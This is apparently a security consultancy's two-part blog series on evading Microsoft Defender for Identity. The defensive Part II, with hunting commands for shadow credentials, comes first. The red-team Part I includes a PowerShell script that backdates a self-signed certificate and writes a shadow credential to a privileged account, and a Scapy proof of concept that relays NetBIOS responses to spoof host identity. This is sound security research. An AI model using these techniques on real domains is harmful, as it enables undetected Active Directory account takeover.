Search

Microsoft Defender for Identity evasions in 2026 – Part II

Search

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026

Microsoft Defender for Identity evasions in 2026 – Part II

Introduction

The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI); the blog post can be found here: Microsoft Defender for Identity evasions in 2026 – Part I. To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Shadow credentials

As discussed in the first part, the detection for setting a shadow credential to a user is not covered directly by DfI, but through the usage of that shadow credential when asking for a TGT. But since the respective alert builds on user-controlled information, the detection for that is also unreliable and can be evaded.

Additionally, it was said that there is no detection logic for setting shadow credentials for machine accounts over NTLM-relayed connections. The detection is based on alerts for authentication coercions and NTLM relaying. Technically, there is a detection logic for this, which is already implemented in DfI but not used for setting shadow credentials from machine accounts to machine accounts. The Network Name Resolution (NNR) feature, which is used as core detection component, is not being used to recognize that the origin, i.e. the source IP address, does not belong to the identity that is used to write the shadow credential.

Shadow credentials: indicators of compromise through device ID

Alternative indicators of compromise (IoCs) for the setting of a shadow credential exist for the scenarios described but are not used by DfI. This is applicable to user accounts and machine accounts. These IoCs both originate from the same value, the device ID.

The shadow-credentials attack technique abuses the msDS-KeyCredentialLink (KCL) attribute of a user or computer object. This attribute can be used to store public keys for that entity allowing for Kerberos authentication. A malicious actor who has permissions to modify that attribute can write his own public key into it and use it for Kerberos authentication.

IoC: device ID for user objects

The abused feature behind the KCL attribute for shadow credentials comes from the obsolete Windows Hello for Business (WHfB) key trust model, which enables password-less authentication and supports key trust. Nowadays Microsoft recommends using Kerberos cloud trust when deploying WHfB.

When the user rolls out WHfB on a new device, the trusted platform module (TPM) generates a key pair, stores the private key in the TPM and a self-signed certificate is generated. The public key is stored in a next-generation credentials (NGC) key of the user’s KCL attribute, along with the GUID of the computer object for which WHfB was registered. This means that a user object has an entry that is an NGC key referencing the corresponding computer object using the computer’s GUID, also known as the device ID.

Current tools such as Whisker and Pywhisker generate a random device ID, which is not assigned to any computer, when creating a shadow credential. This device ID is stored in the NGC key and could be used to detect a shadow-credentials attack. During the write operation for the KCL attribute, it would need to be verified whether the specified device ID corresponds to an existing computer object at all. If the device ID cannot be assigned even during the deployment of the WHfB key, the operation should be considered as an attack. Microsoft’s own PowerShell module, WHfBTools, is a tool designed to specifically remove WHfB keys from user objects. In doing so, it can indicate to the user whether a key is orphaned. The decision if a WHfB key is considered orphaned is based on whether the device ID matches the GUID of a computer object. Thus, the functionality DfI would require to determine whether a WHfB key is a shadow credential is already present in this tool. The following image shows the difference between a legitimate WHfB key and a shadow credential:

Figure 1: Figure 1: KCL attribute of a user
Jakob Scholz

Consultant

Category
Date
Navigation

Figure 1 shows the entries of the KCL attribute of the user “Alonso.Hall”. It can be seen that there are two NGC keys registered for him. The first is a shadow credential set by Whisker and the second is a WHfB key generated by following the process for registering WHfB on a new device.

When using Microsoft’s WHfBTools, as can be seen in figure 2, the NGC key which is a shadow credential is flagged as orphaned.

Figure 2: Using WHfBTools to identify shadow credentials

The legitimate WHfB key was enrolled on PC02, and because of that the device ID for that key points to the GUID from PC02:  

Figure 3: GUID PC02

When searching for shadow-credential IoCs actively, the already mentioned tool WHfBTools could be used to extract the information of the KCL attribute from user objects.

To extract the KCL attribute of the user “Alonso.Hall”, the following command would be used:

Get-ADWHfBKeys -Domain jsc.lab -SamAccountName Alonso.Hall

To check if a key is a shadow credential, the key device ID, which should be pointing to a computer GUID in Active Directory, can be checked. This is done by searching for a computer object by its GUID using the ActiveDirectory module.

Get-ADComputer -Identity be42eae5-239b-40da-8c01-41d9ea0df7af

If no computer objects exist under that GUID and the key credential was set recently, it’s highly suspicious.

Read the blog post Detecting shadow credentials, which also explains the searching of shadow credentials for user objects in hybrid setups with Entra ID.

IoC: device ID for computer objects

For computer object’s NGC keys, the device ID also plays a role when it comes to identifying shadow credentials.

Computer objects have the right to write the KCL attribute for themselves. When certain requirements are met like the computer is running Credential Guard or TPM existence, the computer can create a key pair and store the public key in its KCL attribute. This enables the computer to perform Kerberos authentication using key trust. This feature is called “domain-joined device public key authentication”. If the process is initiated, a key pair is created and the private key is protected by Credential Guard or the TPM, and the public key is stored in the KCL attribute of the computer object.

If the Group Policy Object (GPO) “Support device authentication using certificates” is active on the relevant computer, it can authenticate itself using Kerberos PKINIT via the key pair. Thus, it is legitimate for computer objects to write their own KCL attribute, and a shadow credential can be set for a DC or a CA without being detected if it is done from the identity of the machine account.

While DfI doesn’t use NNR to detect shadow credentials set over NTLM relay, the device ID can be used to identify it. Since the NGC key is supposed to be used for its own computer, it has no device ID to link to. But when using ntlm-relayx to set the shadow credentials, ntlm-relayx generates a random device ID, which indicates that the NGC key is a shadow credential. The device ID field for computer object’s NGC keys will be empty when being set legitimately. When inspecting the KCL attribute of PC02, which has an NGC key enrolled through Credential Guard, it can be seen that the device ID is empty:

Figure 4: KCL attribute of PC02

Unfortunately, WHfBTools can only be used to view the KCL attribute for user objects. For computer objects the DSInternals PowerShell module can be used. Note that DSInternals can be flagged as malicious as it also can be used in an abusive way. The following snippet can be used to find all computer objects in Active Directory that have NGC in the “Usage” field and a “DeviceId” field that is not empty:

Get-ADComputer -Filter 'msDS-KeyCredentialLink -like "*"' -Properties msDS-KeyCredentialLink | Select-Object -ExpandProperty msDS-KeyCredentialLink | Get-ADKeyCredential | Where-Object Usage -eq ‘NGC’ -and -not [string]::IsNullOrWhiteSpace($_.DeviceId)

Pass the cert

For detecting pass-the-cert attacks, different kinds of Windows security events can be monitored. ADCS-related events for issuing certificates, Kerberos authentication using PKINIT and modification of the key credential link attribute should be monitored and corelated.

Pass the cert after shadow-credential attack

When PKINIT is used to authenticate, the Windows security event 4678 (“A Kerberos authentication ticket (TGT) was requested”) can be seen, indicating that a certificate was used to authenticate. This can be corelated with the event 5136 (“A directory service object was modified”), when the KCL attribute of the entity, was modified. For parsing the information about the KCL attribute, the discussed tools WHfBTools and DSInternals can be used. If the parsing of the KCL attribute indicates that a shadow credential was set, the authentication using Kerberos PKINIT should be considered suspicious, too.

General signs for pass the cert

Activities related to certificate issuing when using AD CS in the environment should also be monitored. For the CA the relevant event is 4887 (“Certificate Services approved a certificate request and issued a certificate”), which appears on the CA and must be logged there. It can be looked for authentications via PKINIT for users and machines that never use PKINIT and especially if that request is made from a new or unexpected host. Additional signs are when WHfB is not used in the environment or no certificate service is used.

Alternative handling of NNR-based alerts

In the first blogpost, three alerts were discussed that can be evaded when tampering with NNR. These alerts belong to the attack techniques DCSync, ESC8 and the special case of pass the cert when it’s about domain controller machine accounts trying to receive a TGT.

All of these attacks had the same detection logic: Identifying if the source IP address from which the potential attack occurred is a domain controller in the case of DCSync or, in the case of ESC8 and pass the cert, the specific domain controller in whose context the request was made.

While showing that the primary methods using the three protocols (NetBIOS, DCE/RPC and RDP) used by DfI in version 2.2 can be evaded, a better approach would be to use something that’s out of the control of the attacker.

As explained, the secondary option in DfI uses the domain name service to resolve IP addresses to hostnames, but only as a fallback if the primary methods give unclear or no responses.

One approach would be to use this secondary option yourself. This would be possible when thinking of manual monitoring or searching for IoCs. The corresponding events to search for in the Windows events logs are:

  • Pass the cert (domain controller): 4678
  • ESC8: 4887
  • DCSync: 4661 and 4662

The information obtained from these events can be used to tell from which source IP address the request originated and under which identity the operation was performed. Using DNS to do a reverse lookup from the IP address to the DNS name can reveal if the source IP address belongs to the machine under which identity the request for the resources was made.

Inspecting Defender for Identity combined with Defender for Endpoint

A detection weakness already discussed was about shadow credentials set to user objects, where the detection only happened when setting a shadow credential to the AD built-in administrator (S-1-5-<domain>-500), but not for other user objects. When combining Defender for Endpoint (DfE) with DfI, it’s possible to detect the setting of shadow credentials for user objects, which is not detected by using DfI only. But this is only possible if the attacker is caught at one endpoint, when DfE notices that a tool like Whisker or Pywhisker was used. Even though an advanced attack will most likely not be detected by DfE using an offensive tool, the behavior when combining the indicators from DfE with those from DfI is interesting.

When DfE notices the usage of Whisker, it raises the alert “An active ‘Whisz’ malware process was detected while executing”, showing the information about the execution on the command line and the user under whose identity this was done:

Figure 5: Usage of Whisker detected by DfE

The user “Alonso.Hall” set the shadow credential to the user “ADM”. When DfI is also used in the environment and the event 5136 is detected, this information will be put together and, in Defender XDR, the alert “Shadow credentials added to account” is raised.

The first information is the execution of Whisker under the identity of the user “Alonso.Hall”. The second is the security event showing that “Alonso.Hall” modified the KCL attribute of the user “ADM” at the same time as the execution of Whisker was registered:

Figure 6: Event 5136: Shadow-credential set to ADM

Upgrading to Defender for Identity 3.0

The best option to handle the alerts for attacks against domain controllers that can be evaded by spoofing NNR answers is to upgrade to DfI version 3.0. This version uses the Defender device inventory as trusted database to perform the needed resolving, to make NNR function, without involving the potential attacker in the detection logic.

As can be seen in the deployment diagram in figure 7 (March 2026), only domain controllers can use the sensor in version 3.0. The CA, Federation server and Entra connect server remain in sensor version 2.2. For domain controllers the usage of version 3.0 is only possible when running as Windows Server 2019 or higher and when running with DfE on it.

Figure 7: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)

Upgrading from DfI sensor version 2.2 to 3.0 is straightforward. When the requirements are met, the migration can be done over the Microsoft Defender portal following this guide Migrate from Defender for Identity sensor v2 to sensor v3.x.

Another advantage of DfI sensor 3.0 compared to 2.2 is the “automatic Windows event auditing”, which configures the correct auditing of Windows security events. While it was possible in DfI version 2.2 to reduce the detection capabilities when the relevant events were not audited properly, this problem is fixed in version 3.0.

It’s important to note that the upgrading of the sensor to version 3.0 must be done manually and there is no mechanism where it’s done automatically via an update. 

References

  1. https://support.microsoft.com/en-us/topic/using-whfbtools-powershell-module-for-cleaning-up-orphaned-windows-hello-for-business-keys-779d1f3f-bb2d-c495-0f6b-9aeb940eeafb
  2. https://learn.microsoft.com/en-us/windows-server/security/kerberos/domain-joined-device-public-key-authentication
  3. https://learn.microsoft.com/en-us/defender-for-identity/deploy/migrate-to-sensor-v3
  4. https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/

Further blog articles

Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Microsoft Defender for Identity evasions in 2026 – Part I

Search

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026

Microsoft Defender for Identity evasions in 2026 – Part I

Introduction

When it comes to working with Microsoft Defender for Identity (DfI) from an offensive perspective, for instance during a red team assessment, research has already been conducted that highlights detection and evasion possibilities for different alerts. Research was previously done by Synacktiv, for example, for one of the pass-the-cert alerts (“Suspicious certificate usage over Kerberos protocol (PKINIT)”), multiple reconnaissance alerts, alerts for kerberoasting, AS-REP roasting and golden-ticket attacks.

The first part of this blogpost will summarize the research conducted at cirosec during the last few weeks related to DfI’s detection capabilities for high-impact attacks on Active Directory like shadow-credentials, pass-the-cert, ESC8 and DCSync and its respective evasion possibilities. Also, one of DfI’s main components called “Network Name Resolution” will be introduced, which is vulnerable to spoofing and relaying in DfI version 2.2, allowing multiple alerts to be evaded. Differentiation will be made and demonstrated between the DfI versions 2.2 and 3.0. 

The second part of the blogpost will show options for the blue teamer’s perspective and offer alternative possibilities to detect some of the attacks that were performed while using DfI evasion. If you are interested in this, the blogpost can be found here: Microsoft Defender for Identity evasions in 2026 – Part II

When talking about “evasion” in this blogpost, the term is defined in two ways. The first is when the detection logic for a part of an attack does not exist, which can be used to evade alerting DfI in general. The other definition of evasion is when performing an attack and actively misleading existing detection logics to evade the alert. 

Defender for Identity – architecture and overview

Microsoft DfI is one of the main components of the Microsoft Defender XDR solution besides other security products like Microsoft Defender for Endpoint and Defender for Office 365. DfI aims to help organizations to detect identity-related attacks across on-premises Active Directory. To accomplish that task, DfI collects different signals from the network through its agents, which are placed at the most critical Windows servers. The identity signals gathered by these agents are transferred into the Microsoft Defender XDR portal, where a correlation of these signals with data from other products like Defender for Endpoint happens, which can highlight ongoing attacks, starting from one endpoint, going across the domain against sensitive targets like domain controllers.

Figure 1: Microsoft Defender XDR (https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview)

The following Windows server rolls for DfI deployment are currently supported:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

Laboratory setup

Figure 2: Lab setup
Jakob Scholz

Consultant

Category
Date
Navigation

Looking at the initial lab setup, there are two domain controllers (DC) in the DfI versions 2.2 and 3.0, and a certificate authority (CA) is provided, too. Besides that, there are two clients: a domain-joined Windows workstation called PC02 and a Kali client that is not domain joined. Both clients represent an attacker on the network. The domain controllers with the two different versions of DfI allow to test against both of them.

The alerts covered in this blogpost don’t have a learning period, meaning there is no baseline that must be learned over a given time about what normal or unnormal network activities are. They behave on “static” conditions, making the alert work from the beginning of the setup. The information whether an alert has a learning period is shown at the DfI documentation here, at least for alerts classified as “DfI classic alerts”. Microsoft is moving the DfI classic alerts during an ongoing transition to “DfI XDR Alerts”, where less information is provided.

Another aspect to consider is the endpoint where attacks are carried out. Since Defender XDR correlates information between its different security products, it can even detect attacks that are evaded “DfI-wise”, for instance when the corresponding tool to perform an attack is recognized at an endpoint that is monitored through Defender for Endpoint. Since the focus was on DfI only, in the lab, PC02 is set up without Defender for Endpoint.

All of the results shown in this blogpost were generated between November 1, 2025 and February 1, 2026 and are based on the laboratory setup, which does not represent an enterprise environment. Therefore, DfI and the results may behave differently in a productive environment.

Shadow credentials

Attack overview

The shadow-credentials attack makes use of the msDS-KeyCredentialLink (KCL) attribute. This attribute can be used to store public keys and link them to the corresponding user or computer object, allowing for Kerberos authentication. When an attacker gets into a position where he can write the KCL attribute for another user or computer, he can essentially store his own public key there, making it possible to authenticate with the certificate as these entities. The authentication is done over the Kerberos extension for “Public Key Cryptography for initial authentication” (PKINIT) by presenting the certificate. The following weaknesses and evasion options occur in DfI versions 2.2 and 3.0.

General detection requirements

Talking about the alerting possibilities, there are two different alerts, and it must be distinguished between three different scenarios when looking at DfI’s detection capabilities. These scenarios differ regarding which entity is setting a shadow credential to which entity. The relevant difference in the entities is the target type, i.e. whether it’s a user object or a computer object.

A general requirement for DfI to identify a shadow-credentials attack is the correct auditing on the domain controllers. The event 5136 “A directory service object was modified” is required in order to make DfI capable of knowing that the KCL attribute, where the public key (shadow credential) is stored, was modified.

User to user

In the first scenario, a user is able to set a shadow credential for another user. There seems to be nearly no detection logic for this. A user can set a shadow credential for another user, except for the AD built-in administrator (S-1-5-<domain>-500), without raising the alert.

When setting a shadow credential (in this case for the built-in administrator (S-1-5-<domain>-500)), the first thing to happen is the event that occurs and is evaluated by DfI: 

Figure 3: Shadow credential – event 5136

If done for the built-in administrator, the alert for setting a shadow credential is raised:

Figure 4: Shadow credential alert: Suspected account takeover using shadow credentials

For all other kinds of user objects – even when high privileged through group membership – shadow credentials can be set without alerting DfI. In the tests, the users for which a shadow credential has been set were members of the following groups:

  • Administrators
  • Domain Admins
  • Enterprise Administrators
  • Group Policy Creator Owners
  • Schema Admins

User to computer

The second scenario to consider is writing a shadow credential from the user context to a computer object. Here, a distinction between sensitive and non-sensitive computer objects can be made. Computer objects seen as sensitive and instantly alerted when a shadow credential is set for them are Windows servers with the following rolls:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

This list is not exhaustive, and more server roles could be affected. But regular workstations that don’t hold a Windows server role seem to be classified as non-sensitive by Microsoft, and shadow credentials can be set without any alerting.

Computer to computer

Using authentication-coercions combined with NTLM relaying can be used by an attacker to authenticate as a foreign computer, allowing to write shadow credentials for the impersonated computer. This is because computer objects have the legitimate right to self-edit their KCL attribute.

In a coercion attack, a third-party machine account can be forced to authenticate via NTLM to a target of the attacker’s choosing. The attacker can forward this authentication information to another target via NTLM relaying and can thus impersonate the relayed machine account. Extensive information about these two attack techniques can be found in the following two blogposts: NTLM Relay and The Ultimate Guide to Windows Coercion Techniques in 2025.

The context here is different when compared to writing a shadow credential from a user identity to a computer: A machine account is writing the shadow credentials for itself, and there also exists a legitimate mechanism making use of it, which may be the reason why no shadow-credentials alert is raised when setting one for a sensitive computer object like a DC or a CA through NTLM relaying. Windows enables the possibility of “domain-joined device public key authentication”, which allows a computer to perform Kerberos authentication using key trust. When certain requirements are met like the device is running Credential Guard or TPM existence, the device can create a key pair and store the public key in its KCL attribute.

When performing the attack, it must be kept in mind that there are alerts in DfI targeting NTLM-relaying and authentication-coercions attacks. But as described there is no detection for the shadow-credentials attack itself, when talking about the NLTM relay scenario, where the identity of the computer object is used to write the shadow credential to that computer.

Shadow-credentials alert through PKINIT

The second alert that can be triggered in the context of a shadow-credentials attack is called “Shadow Credential Added to Account and used for Authentication”. This alert depends on another alert, namely the alert: “Suspicious certificate usage over Kerberos protocol (PKINIT)”. This alert is triggered when DfI detects that the usage of a certificate over the PKINIT extension is done by an attacker, namely as pass-the-cert attack, which is explained in the next section. When redeeming the set shadow credential to retrieve a Ticket Granting Ticket (TGT), which is done over the PKINIT extension of the Kerberos protocol, the set shadow credential can be detected retroactively by detecting the pass-the-cert attack. This extends the possibilities to detect shadow credentials set to user objects, which, as said previously, was nearly impossible. But the problem with this alert is that it depends on another alert, which makes it less robust. In summary, someone who can evade the alert for “Suspicious certificate usage over Kerberos protocol (PKINIT)” will automatically evade the alert for “Shadow Credential Added to Account and used for Authentication”.

Pass-the-cert attack

Attack overview

When having obtained a certificate through a shadow-credentials attack or an ADCS-ESC vulnerability, an attacker can use this certificate to request a TGT, authenticating him as the victim in whose context the certificate was created. The ADCS-ESC vulnerabilities refer to a range of misconfigurations possible for the Active Directory Certificate Services. See the whitepaper from Specter Ops Certified Pre-Owned for more information.

Reviewing existing evasion possibility

DfI comes with a detection logic for this attack, in which it tries to determine if an offensive tool like Rubeus was used to build the Authentication Service request (AS-REQ). The AS-REQ is the initial Kerberos message sent by a client to the Key Distribution Center (KDC) to request a TGT and initiate the authentication process. The detection is done by looking at the way how the ticket was requested. Synacktiv has done the research for the respective alert “Suspicious certificate usage over Kerberos protocol (PKINIT)” and found out that the indicators used by DfI to tell if an AS-REQ is built in a legitimate way or by an attacking tool are the eTypes. The eTypes are supported encryption types suggested by the client to encrypt the Kerberos tickets. Those suggested by Rubeus when building an AS-REQ are unique, making it easy for DfI to fingerprint that Rubeus was used.

The eTypes that are common in legitimate applications and can be used to bypass this alert are listed in Synacktiv’s blogpost here. The evasion was still working at the time of writing this article in March 2026 for DfI versions 2.2 and 3.0. The following Wireshark dump shows the AS-REQ when built with an adjusted version of Rubeus, using legitimate eTypes:

Figure 5: AS-REQ with legitimate eTypes

Taking a deeper look at the detection logic

Interestingly, this tool-based detection, where DfI tries to figure out if an AS-REQ is suspicious by inspecting the eTypes, is the second part of the detection chain for this alert. Before DfI investigates the suggested eTypes, it checks whether the creation time of the certificate is bigger or lower than two hours. This is done using the value NotBefore inside the certificate, which indicates the date on which the certificate becomes valid. The tool-based detection is only applied for certificates created during the last two hours. If the NotBefore value indicates that the certificate’s creation time is bigger than two hours, no further investigation is done by DfI, even if an unmodified version of Rubeus using the standard eTypes is used, which could be fingerprinted.

Shadow credentials and PKINIT

The awareness of that behaviour opens up another attack vector. If someone could modify the NotBefore value of a certificate that is used for Kerberos client authentication, they could bypass the whole detection chain. Certificates gained through ADCS-ESC-related attacks, e.g. ESC1, will be signed by the CA and cannot be modified without breaking the signature, which would result in the certificate getting rejected by the KDC when requesting the TGT. But for a self-signed certificate, which results from setting a shadow credential, the NotBefore value could be adjusted to a value in the past, make it look like the creation date was different. This could be done by using Michael Grafnetter’s DSInternals PowerShell module with the following code snippet from here. This makes it possible to write a shadow credential while having the possibility to modify the self-signed certificate. The following part of the script generates a self-signed certificate:

$upn = 'ADM@jsc.lab'
$ownerDN = 'CN=ADM,OU=Test_User,DC=jsc,DC=lab'
$userSid = 'S-1-5-21-1605340795-4164095229-358834758-7125'
$deviceID = (New-Guid)
$certificateSubject = '{0}/{1}/{2}' -f $userSid, $deviceID, $upn

$certificate = New-SelfSignedCertificate -Subject $certificateSubject `
      -KeyLength 2048 `
      -Provider 'Microsoft Strong Cryptographic Provider' `
      -CertStoreLocation Cert:\CurrentUser\My `
      -NotBefore (Get-Date).AddHours(-2)`
      -NotAfter (Get-Date).AddYears(30) `

-TextExtension '2.5.29.19={text}false', '2.5.29.37={text}1.3.6.1.4.1.311.20.2.2' `
      -SuppressOid '2.5.29.14' `
      -KeyUsage None `
      -KeyExportPolicy Exportable

The relevant part for the evasion is to set the NotBefore parameter to a value in the past:

-NotBefore (Get-Date).AddHours(-2)

After the creation of the certificate, a key credential link can be extracted from it, suitable to be set in the KCL attribute as a shadow credential:

$ngcKey = Get-ADKeyCredential -Certificate $certificate -DeviceId $deviceID -OwnerDN $ownerDN -CreationTime (Get-Date)

Set-ADObject -Identity $ngcKey.Owner -Add @{'msDS-KeyCredentialLink' = $ngcKey.ToDNWithBinary()}

As discussed in the section about shadow credentials, in part “Shadow-credentials alert through PKINIT”, the creation of a shadow credential can be detected through the subsequent authentication against the KDC when DfI classifies the authentication as malicious, which then also results in the alert for shadow credentials. As shown in this section, the pass-the-cert alert can also be bypassed by waiting two hours or making the certificate look like it’s older than two hours, but this only applies to self-signed certificates. Eventually, this makes it possible to evade the pass-the-cert alert when creating shadow credentials, which also results in evading the alert for setting the shadow credential.

Network Name Resolution (NNR)

Network Name Resolution (NNR) is a core component for several alerts to work, but is vulnerable to spoofing and relaying, making it possible to evade multiple alerts.

The DfI documentation describes NNR as follows:
Using NNR, Defender for Identity can correlate between raw activities (containing IP addresses), and the relevant computers involved in each activity. Based on the raw activities, Defender for Identity profiles entities, including computers, and generates security alerts for suspicious activities”.

NNR works by requesting the NetBIOS host and domain name as well as the DNS name from the IP address, from where a potential attack occurred, using three different primary methods:

  • NTLM over RPC (TCP port 135)
  • NetBIOS (UDP port 137)
  • Remote desktop protocol (TCP port 3389)

There also exists a secondary method, which is used if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. The secondary option makes use of DNS. The DfI agent will make a reverse DNS lookup of the IP address to get the hostname of the machine.

By using these methods, DfI can tell the origin of the suspicious traffic and map it to a computer hostname, making it possible to distinguish between an attack or legitimate behavior. How knowing the hostname of the suspicious computer helps DfI determine if an attack occurred is explained in the next section using one alert whose detection logic is based on NNR.

NNR in action: Suspected suspicious Kerberos ticket request

Using an example to see the inner working of NNR and its weakness, it can be continued to obtain TGTs by using certificates. While having already discussed the alert “Suspicious certificate usage over Kerberos protocol (PKINIT)”, there is another alert when trying to request a TGT by offering a certificate via PKINIT. This alert is called “Suspected suspicious Kerberos ticket request” and has an interesting scope. The research has shown that it is only applied when trying to authenticate as a domain controller machine account using a certificate.

For this example, it is assumed that the adversary is on PC02.jsc.lab (172.16.94.11) and has managed to get a certificate valid for DC02 allowing Kerberos client authentication, for instance through shadow credentials or an ADCS-ESC vulnerability. When the attacker from PC02 uses the certificate to authenticate as DC02$ against DC01.jsc.lab, the DfI agent at DC01 will send NNR requests to the source IP address from which the AS-REQ for DC02 request originated, which is 172.16.94.11. This is done to determine if DC02 is actually at this IP address. The described flow is illustrated in the following image:

Figure 6: NNR flow

The only information the DfI agent has before starting the investigation using NNR is an AS-REQ requesting a TGT for DC02 and the source IP address of the suspicious machine. The AS-REQ provides a valid certificate with the subject DC02$, indicating that the certificate belongs to DC02$. The requester has also sent the signed timestamp, giving proof of possession of the private key.

Figure 7: AS-REQ DC02$

Therefore, it makes sense to have a detection logic for that kind of request. An AS-REQ for a domain controller machine account must originate from the source IP address of the respective domain controller, in the case of Kerberos authentication. If a TGT for a domain controller machine account is requested from a machine that is not the domain controller itself, as indicated by network attributes such as IP address and hostname, this strongly indicates that an adversary has obtained a valid certificate, which would be explainable through attacks like shadow-credentials or ADCS-ESC-related attacks.

Inspection of NNR primary methods

Continuing with the example from above, specific actions are happening on DC01 and PC02 when the attacker performs an AS-REQ for DC02 against the KDC on DC01 starting from PC02. The DfI agent’s reaction on DC01 (172.16.94.1) to the incoming AS-REQ is inspected using Procmon:

Figure 8: DfI sensor process performing NNR

“Microsoft.Tri.Sensor.exe” is the relevant process of DfI, which performs the NNR. The first two entries 1.) and 2.) are requests and responses to PC02 using NetBIOS – UDP port 137. Entries 3.), 4.), 5.) and 6.) are responsible for the NNR method using the endpoint mapper – TCP port 135. Entry 7.) uses RDP – TCP port 3389.  

When monitoring PC02, the incoming NNR requests can be noticed, where each source port can be mapped to the source ports in figure 8:

Figure 9: NBNS node status request

The NetBIOS request from the DfI agent to port 137 on PC02 can be noticed in figure 9. Furthermore, we can see the request at the DCE/RPC endpoint mapper on TCP port 135:

Figure 10: NTLM over RPC

Eventually, there is the connection to RDP on TCP port 3389:

Figure 11: RDP

NNR method: NetBIOS node status request

The NetBIOS request done by DfI is a so-called NetBIOS node status request, which is a unicast request to retrieve NetBIOS-related information about an endpoint. The NetBIOS node status response from PC02 contains information about its NetBIOS hostname, the NetBIOS domain name and the NetBIOS service type. The hostname and domain name are the relevant information which is used by the DfI agent to answer the previous question of whether the computer with IP address 172.16.91.11 (PC02) is in fact DC02. Since PC02 is not DC02, the NetBIOS-related information from PC02 will lead DfI to alert this attack.

Figure 12: NetBIOS node status response (PC02)

The three highlighted areas in figure 12 contain the discussed information that is essential for the detection logic. Each entry corresponds to a registered name, which are three in total. The first name “JSC<00> (Workstation/Redirector)” states that the NetBIOS domain name is “JSC”, and the service type is 0x00, which represents a workstation. The two other names just differ in the service types, while 0x20 indicates a file service. “PC02<00> (Workstation/Redirector)” indicates the NetBIOS hostname is “PC02”.

The NetBIOS request generated by DfI can also be triggered by using the native Windows tool nbtstat by using nbtstat -A <ip>. The result can be seen in the following image, containing the same information as when inspecting the NetBIOS request through Wireshark:

Figure 13: NetBIOS node status request using nbtstat

The alert can even be inspected before appearing in the Defender XDR portal, by looking into the local logging files. These are stored at “C:\Program Files\Azure Advanced Threat Protection Sensor\2.255.XXXXX.XXXXX\Logs\Microsoft.Tri.Sensor.log” at the DC. The collected information can be found in the log file:

Figure 14: Alert: “Suspected suspicious Kerberos ticket request” in logs

The log file indicates an alert triggered by the use of a certificate for one machine account on another computer. The highlighted items “CertificateSubject=DC02$” and “SourceAccountName=jsc.lab\DC02$” is the information extracted from the AS-REQ and the provided certificate. “SourceComputerName=DomainName=JSC Name=PC02” is obtained from the NetBIOS node status response. These are the key values for the detection logic. If the NetBIOS hostname and NetBIOS domain name don’t match to the certificate subject and account name, like in this case, the alert is raised. If the values match, no alert will be raised.

Evasion using NetBIOS

Since the detection logic for the alert “Suspected suspicious Kerberos ticket request” was uncovered, evasion possibilities can be considered.

There are two possibilities to evade the alert or more generally, to manipulate NNR. The first is to spoof a NetBIOS response to the DfI agent directly by specifying the needed NetBIOS information and answering the NetBIOS node status request. The other option is to take the incoming NetBIOS request from the DfI agent, relay it to the desired target and relay the response back to the DfI agent.

Relaying the NetBIOS node status request

To understand the relaying of the NetBIOS request, refer to the following two diagrams:

Figure 15: AS-REQ
Figure 16: Relaying of NetBIOS node status request/response

After the request of the TGT (1 & 2), DfI will start using NNR and asking the sender for its NetBIOS node status (3). A malicious actor can relay the NetBIOS request to the target to which that TGT would belong, which is DC02 (4) in the example. The response from DC02 can be relayed back over PC02 to DC01 (6). This will result in evading the detection since the AS-REQ and certificate indicates DC02$ as the subject and the NetBIOS information from the machine that performed the AS-REQ seems to match to DC02, from the perspective of the DfI agent on DC01.

The relaying of the NetBIOS method can be performed in a PoC using the Python library Scapy.

def relay_nbns_node_status_request(pkt):
   dc01_ip = "172.16.94.1"
   dc02_ip = "172.16.94.4"
   udp_src_port = pkt[UDP].sport
   dc01_nbns_node_status_request = pkt[NBNSHeader]

    dc02_nbns_node_status_response =
   sr1(IP(dst=dc02_ip)/UDP()/dc01_nbns_node_status_request)

   dc02_nbns_node_status_response = dc02_nbns_node_status_response[NBNSHeader]
   send(IP(dst=dc01_ip)/UDP(dport=udp_src_port)/dc02_nbns_node_status_response)

The function takes a network package as argument (pkt), which must be sniffed before; this can be done with Scapy. In the first block, the relevant IP addresses and the UDP source port from which the package originated are saved as well as the extraction of the NetBIOS node status request from DC01.

The second block builds the NetBIOS node status request for DC02, sends it to DC02 and also receives the response – the NetBIOS node status response. The last block builds the response to DC01 and sends it.

When using nbtstat on DC01 again to retrieve the NetBIOS information from PC02, it can be seen that it was possible to successfully tamper with the NetBIOS node status request. PC02 (172.16.94.11) is now appearing to be DC02.

Figure 17: Tampered NetBIOS node status response PC02 (relayed)

This way to perform the evasion using relaying has some advantages, but also certain disadvantages when compared with the second method, which will be presented next.

